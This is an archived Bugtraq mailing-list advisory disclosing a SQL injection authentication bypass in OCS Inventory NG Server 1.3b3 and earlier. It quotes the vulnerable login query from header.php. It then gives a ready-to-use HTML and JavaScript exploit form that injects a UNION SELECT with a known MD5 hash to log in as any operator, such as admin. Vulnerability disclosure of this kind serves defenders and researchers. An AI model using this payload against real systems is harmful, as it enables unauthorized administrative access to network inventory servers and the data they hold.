lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Fri, 29 Jan 2010 10:08:52 +0100
From: Nicolas DEROUET <nicolas.derouet@...il.com>
To: bugtraq@...urityfocus.com
Subject: OCS Inventory NG Server <= 1.3b3 (login) Remote Authentication Bypass

OCS Inventory NG Server <= 1.3b3 (login) Remote Authentication Bypass


Software      : Open Computer and Software (OCS) Inventory NG
Download      : http://www.ocsinventory-ng.org/
Discovered by : Nicolas DEROUET (nicolas.derouet[gmail]com)
Version       : 1.03-beta3 and prior
Impact        : Critical
Remote        : Yes (No authentication is needed)


== Description ==

Open Computer and Software (OCS) Inventory Next Generation (NG) is an
application designed to help a network or system administrator keep track
of the computers configuration and software that are installed on the network.

The vulnerability is a sql injection which exists in header.php file.
Attacker could pass a special sql string which can used to create/modify
information stored in the database or authenticated in any user.

script : header.php

102 if(isset($_POST["login"])) {
103   $req="SELECT id, accesslvl, passwd FROM operators WHERE
id='".$_POST["login"]."'";
104   $res=mysql_query($req,$_SESSION["readServer"]) or die(mysql_error());
105
106   if($row=@...ql_fetch_object($res))
107   {
108     // DL 25/08/2005
109     // Support new MD5 encrypted password or old clear password
for login only
110     if (($row->passwd != md5( $_POST["pass"])) and
111         ($row->passwd != $_POST["pass"])) {

== Exploit ==

<script>
  function inject()
  {
    document.getElementById('log').action =
document.getElementById('ocsreports').value + 'index.php';
    sql = "0' UNION SELECT id, accesslvl,
'a181b4673216ad247a0f78066a9646e1' FROM operators WHERE id='"
    document.getElementById('login').value = sql +
document.getElementById('user').value;
    document.getElementById('pass').value = "inject";
  }
</script>
<form name="log" id="log" action="" method="post">
  <table border="0" width="450px">
  <tr>
    <td><b>OCSReports :</b></td>
    <td><input type="text" id="ocsreports" size="40"
value="http://127.0.0.1/ocsreports/" /></td>
  </tr>
  <tr>
    <td><b>Login :</b></td>
    <td><input type="text" id="user" size="40" value="admin" /></td>
  </tr>
  <tr>
    <td><input type="hidden" name="login" id="login" />
        <input type="hidden" name="pass"  id="pass"  /></td>
    <td><input type="submit" name="subLogin" onclick="inject();"></td>
  </tr>
  </table>
</form>

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ